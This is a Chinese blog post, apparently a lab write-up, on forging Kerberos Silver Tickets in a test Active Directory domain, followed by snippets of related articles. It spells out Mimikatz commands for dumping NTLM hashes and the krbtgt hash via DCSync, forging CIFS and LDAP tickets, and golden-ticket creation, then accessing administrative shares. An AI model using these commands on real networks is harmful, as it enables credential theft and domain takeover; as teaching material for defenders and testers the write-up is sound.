3.5 Silver Ticket白银票据制作原理及利用方式

最新推荐文章于 2025-03-13 16:39:58 发布
原创 最新推荐文章于 2025-03-13 16:39:58 发布 · 570 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章详细描述了一个关于如何通过伪造白银票据(ST)来访问Windows域服务的实验,包括获取域控信息、服务账号的NTLMHash、使用Mimikatz工具伪造票据并访问不同服务的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

服务账号介绍

服务账号就是计算机名字+$用来管理服务的账号

白银票据原理

如果说黄金票据是伪造的TGT,那么白银票据就是伪造的ST。 在Kerberos认证的第三部,Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问
server上的指定服务了。所以我们只需要知道Server用户的Hash就可以伪造出一个ST,且不会经过KDC,但是伪造的门票只对部分服务起作用。

实验内容

实验环境

机器名称

IP地址

Windows 10_1(域成员)

192.168.26.129

Windows 10_2(域成员)

192.168.26.130

Windows server 2016(域控)

192.168.26.114

实验前提

  1. 已经控制了域名并且使用域管理员登录或者提权的system
  2. 我们目的是访问Windows 10_2的机器

条件如下:

  1. 域名称
  2. 域的SID值
  3. 目标服务器名称
  4. 可以利用的服务
  5. 服务账号的NTLM Hash
  6. 伪造任意用户名

实验步骤

控制域控
  1. 获取基本信息(域控)
shell whoami /user 获取域的sid值(去掉最后的-500,500表示administrator用户)
shell net config workstation	查看域

SID:S-1-5-21-2665115189-2951733486-2104235742

  1. 获取服务账号的NTLM Hash值(域控)
mimikatz sekurlsa::logonpasswords

Hash:cb651a1ffbd25853dca7ac9aabaa94af

  1. 伪造票据(CIFS服务)在域内主机上(不是域控!)
mimikatz kerberos::tgt		查票
mimikatz kerberos::purge	清票
shell klist		查票
shell klist purge		清票
mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-2665115189-2951733486-2104235742 /target:dc.hack.com /service:cifs /rc4:cb651a1ffbd25853dca7ac9aabaa94af /user:abcd /ptt

  1. 访问域控(用创建票据的域内主机)
shell dir \\dc.hack.com\c$

之前访问

有白银票据之后访问

伪造票据(LDAP共享服务)

mimikatz kerberos::tgt		查票
mimikatz kerberos::purge	清票
shell klist		查票
shell klist purge		清票
mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-2665115189-2951733486-2104235742 /target:dc.hack.com /service:LDAP /rc4:cb651a1ffbd25853dca7ac9aabaa94af /user:abcd /ptt

  1. 查询域控的krbtgt(在域内主机上查询(没有LDAP白银票据是无法查询的))
mimikatz lsadump::dcsync /dc:dc.hack.com /domain:hack.com /user:krbtgt

原本获取不到

添加票据之后,可以获取

控制另一台域主机(Windows10 NW2)
  1. 获取基本信息(域控上获取Windows10 NW2信息)
mimikatz lsadump::dcsync /domain:hack.com /user:PC-nw2$
mimikatz lsadump::lsa /patch		#获取所有域用户的Hash值
mimikatz sekurlsa::msv					#获取当前主机的SID和Hash值

SID:S-1-5-21-2665115189-2951733486-2104235742

Hash:79871a923c6d9969c220c1bf7230d550

  1. 伪造票据(CIFS服务)在域内主机上(不是域控!)
mimikatz kerberos::tgt		查票
mimikatz kerberos::purge	清票
shell klist		查票
shell klist purge		清票
mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-2665115189-2951733486-2104235742 /target:PC-nw2.hack.com /service:cifs /rc4:79871a923c6d9969c220c1bf7230d550 /user:abcd /ptt

  1. 访问Windows10 NW2(用创建票据的域内主机)
shell dir \\PC-nw2.hack.com\c$

之前访问

之后访问

[域权限维持 & 票据攻击] Silver Ticket 白银票据制作原理利用方式
Blue17 の 小窝
03-07 1115
白银票据利用,笔者在实战中发现,以普通域内用户和本地的 System 用户伪造的白银票据利用范围都不太一样,比如同样是伪造 CIFS(共享文件服务)的票据,普通域内用户只能查看目标的目录(不一定哈,在后面的实验中,笔者被自己打脸了,普通域内用户也可以复制),而 System 用户就可以进行复制,比较抽象,希望大家实战时自己总结一下。那么笔者这里不卖关子了,直接说了。白银票据的本质是伪造一个 TS(指定地方的门票)拿着 TS 你只能去指定的地方,比如你买的动物园的票,你就不能去其他地方,相当于是。
白银票据原理制作利用
G3et的博客
01-19 409
1、如果是域普通用户,主要看防火墙,开了防火墙可能会导致dir过不去2、白银票据伪造的是ST,只能访问特定的服务,如cifs(文件共享服务)、winrm(远程管理)3白银票据获取的是服务的hash4、白银票据不通过kdc,相对黄金票据银票更加隐蔽。
白银票据~
Y22Lee的博客
06-05 666
在windows主机之间进行网络文件共享是通过使用微软公司自己的CIFS服务实现的(IPC)第一步:检查电脑是否加入域并查看权限,加入域可以直接使用白银票据。2、如果通过枚举出来一个域中的管理员用户,可以使用如下的命令。在工作组中的机器使用白银票据的时候需要注意如下的问题。白银票据可以伪造的服务非常多,简单列举几个常用的。第三步:伪造LDAP服务的白银票据并注入到内存中。第三步:获取制作白银票据的条件,伪造CIFS服务。第四步:通过dcsync查询域控上的hash值。第六步:使用之前的上线办法上线CS。
域渗透-白银票据和黄金票据利用
orange777
02-23 4059
最近做了一些靶场域渗透的实验,记录下一些关于白银票据和黄金票据的问题。 0x01 白银票据利用 1 环境信息 域控DC 192.168.183.130 域内主机win7 192.168.183.129 2 使用场景 在拿到一个普通的域成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的域用户有域管理员权限。 3 利用过程 说明:这里是用vulnstack4靶机笔记的实验环境,来演示一下利用过程 获取sid whoami /all 伪造票据 MS14-068.exe -u 用户名@域
白银票据原理和使用
qq_45455136的博客
12-21 1278
白银票据原理和使用 白银票据(Silver Ticket)原理 白银票据的使用 服务账号是计算机名字+$用来管理服务的账号 白银票据(Silver Ticket)原理 白银票据是伪造本该由TGS返回的ST(服务票据),从而访问对应的服务 有server用户的hash就可以伪造出ST,且不经过KDC,但伪造的票只对部分服务起作用,权限比黄金票据
伪造白银票据实验
Tranquillity
09-13 706
0x01 实验准备 实验工具: PsExec64工具是内网渗透中的免杀渗透利器。 mimikatz_trunk 工具的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码,还可以提升进程权限、注入进程、读取进程内存等等。 实验环境: Windows server 2008 作为域控制器,域为 yuming.com Windows 7 作为 yuming域下的一台设备 0x02 白银票据条件 域名称 域的SID值 域的服务账号的密码HASH 伪造的用户
3.6-SilverTicket白银票据制作原理利用方式
qq_38122566的博客
03-12 705
服务账号就是计算机名字+$用来管理服务的账号。
深入理解黄金票据白银票据攻击
渗透之路,攻防之间皆学问
02-14 407
黄金票据(Golden Ticket)是攻击者伪造的 TGT。因为 TGT 是由 krbtgt 账号的 NTLM hash 加密生成的,所以当我们拥有了 krbtgt 账号的 hash 时,可以直接在本地伪造 TGT 绕过 Kerberos 认证流程中的身份验证步骤,直接申请服务票据并访问域内资源。
kerberos认证及黄金票据白银票据
qq_64951792的博客
05-22 1300
kerberos认证过程、黄金票据白银票据
【域权限维持】-白银票据
qq_41617902的博客
11-08 494
域权限维持-白银票据的攻击过程与简单检测方式
白银票据及黄金票据的一些学习
dayouzi的博客
08-11 781
Golden Ticket(金票)是通过伪造TGT(TickerGranting Ticket),因为只要有了高权限的TGT,那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。对于攻击者来说,只要拿到了域控权限,就可以直接导出krbtgt的Hash值,再通过mimikatz即可生成任意用户任何权限的Ticket,也就是Golden Ticket
一文搞懂黄金白银票据
m0_75218183的博客
06-29 1634
在学习黄金白银票据之前,我们先要搞懂Kerberos(三头保卫神犬)协议。Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下, Kerberos 作为一种可信任的第三方认证服务,是通过传统的密码技术(如:共享密钥)执行认证服务的。
黄金票据白银票据详解
故事讲予风听
06-22 6156
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET
哈希传递攻击/黄金白银票据
Y5neKO's blog
09-17 2102
Q&A Q1:pth在什么情况下能成功、哈希传递受到什么限制、什么情况下不能传递? A1:①pth在获取到目标机器中RID为500的内置管理员账户或在目标机器本地管理员组的域成员账户的hash值的情况下能成功;②哈希传递会受到目标系统上的UAC的限制,如果不是RID=500的内置账户则不会以完全管理员权限登录系统;③若目标系统完全禁止了所有用户的远程登录权限(包括RID为500的内置管理员),则无法进行传递。 Q2:安装补丁KB2871997后影响 A2:见文章中KB2871997补丁 -->
域渗透之银票据学习
cxk
06-10 1165
票据silver ticket):它不需要和域控制器进行通信,原理是伪造TGS,使用的是计算机账户的hash进行加密的,所以只能访问指定的权限,也就是只能访问特定的服务。 0x01 银票据利用条件 域控计算机账户的ntlm hash 域中的sid值 一台域中主机 与其说是一种攻击方式,不如说是一种后门,当域控权限掉后,再重新获取权限。 0x02 实战 环境 域控2k3,ip:192.168.5...
域权限维持(黄金票据白银票据)
qq_18811919的博客
03-19 2266
黄金票据白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。 这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统 帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。
域内横向渗透-PTT票据传递之白银票据 (Silver Ticket)
m0_62783065的博客
09-22 519
PTT票据传递之黄金票据 Silver Ticket,介绍了白银票据原理及其利用所需要的条件和利用方法。
黄金/白银票据制作
weixin_67925097的博客
08-29 1575
免责声明:该文章仅提供学习交流,若用于违法行为与本人无关。
渗透测试的域渗透之白银票据伪造
没有网络安全就没有国家安全
03-13 418
渗透测试的域渗透之白银票据伪造
域渗透 白银票据配置 伪造
最新发布
03-19
### 域渗透中的白银票据与黄金票据 #### 白银票据 (Silver Ticket) 的配置与伪造方法 白银票据是一种针对特定服务的伪造 Kerberos 票据。它允许攻击者冒充某个用户身份来访问指定的服务,而无需获得整个域的控制权。 以下是伪造白银票据的过程: 1. **收集目标信息** 需要获取目标域的信息,包括域名 (`test.lab`) 和 SID (`S-1-5-21-...`)[^3]。还需要知道目标服务名称(如 `LDAP`)、目标主机名以及用于加密的目标账户哈希值(通常是 NTLM 或 RC4 密钥)。 2. **生成白银票据** 使用 Mimikatz 工具生成伪造的 LDAP 服务票据,并将其保存到文件中: ```bash mimikatz "kerberos::golden /domain:test.lab /sid:S-1-5-21-2196907948-52438630-2517523304 /target:DC.test.lab /service:ldap /rc4:065c43c4ca3bfba69038978836565ffe /user:administrator /ticket:silver.kirbi" ``` 3. **注入票据** 将生成的白银票据注入到当前会话的内存中以便使用: ```bash mimikatz "kerberos::ptt silver.kirbi" ``` 通过上述操作,攻击者可以伪装成管理员身份访问目标服务器上的 LDAP 服务[^2]。 --- #### 黄金票据 (Golden Ticket) 的配置与伪造方法 相比白银票据,黄金票据提供了更广泛的权限——它可以绕过 TGT 获取阶段直接创建有效的 TGT 票据,从而实现对整个域资源的无限制访问。 其主要步骤如下: 1. **提取 krbtgt 账户密码散列** 这一步通常依赖于已有的高权限凭证或者通过其他漏洞完成。例如,在拥有 Domain Admin 权限的情况下可以从 Active Directory 数据库导出 krbtgt 散列值。 2. **生成黄金票据** 利用 Mimikatz 创建自定义的有效期无限长且不受时间戳约束的 TGT: ```bash mimikatz "kerberos::golden /user:Administrator /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:82dfc71b72a11ef37d663047bc2088fb /id:500 /ptt" ``` 此命令将自动加载新生成的黄金票据至当前进程环境变量中[^4]。 --- #### Kerberos 攻击技巧对比分析 | 特性 | 黄金票据 | 白银票据 | |--------------------|-----------------------------------|------------------------------| | 影响范围 | 控制全域能力 | 局部服务能力 | | 所需条件 | Krbtgt hash | Service account credentials | | 复杂度 | 较高 | 中等 | | 检测难度 | 更难 | 易被发现 | 尽管两者都基于相同的原理即滥用Kerberos协议机制,但由于作用层面不同所以在实际应用中有各自适用场景. ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值